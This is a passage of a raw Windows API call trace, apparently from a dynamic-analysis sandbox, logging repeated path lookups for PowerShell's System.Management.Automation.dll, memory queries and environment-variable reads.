lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0065.142] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0065.143] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.147] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0065.168] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.168] CoTaskMemFree (pv=0x1b96d1e0) [0065.169] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.169] CoTaskMemFree (pv=0x1b96d1e0) [0065.169] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.169] CoTaskMemFree (pv=0x1b96d1e0) [0065.188] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.188] CoTaskMemFree (pv=0x1b96d1e0) [0065.192] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.192] CoTaskMemFree (pv=0x1b96d1e0) [0065.192] CoTaskMemAlloc (cb=0x104) returned 0x1b96d1e0 [0065.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.193] CoTaskMemFree (pv=0x1b96d1e0) [0065.197] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0065.199] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0065.328] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0065.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0065.574] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b96d400 [0065.768] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0065.846] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0065.850] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0065.850] VirtualQuery (in: lpAddress=0x24a400, lpBuffer=0x24b2c0, dwLength=0x30 | out: lpBuffer=0x24b2c0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.070] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.070] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.070] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.070] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.070] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.070] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.070] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.070] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.071] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.071] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.071] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.071] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.071] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.071] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.071] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.071] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.071] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.072] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.072] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.072] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.072] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.072] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.072] VirtualQuery (in: lpAddress=0x24b9b0, lpBuffer=0x24c870, dwLength=0x30 | out: lpBuffer=0x24c870*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, 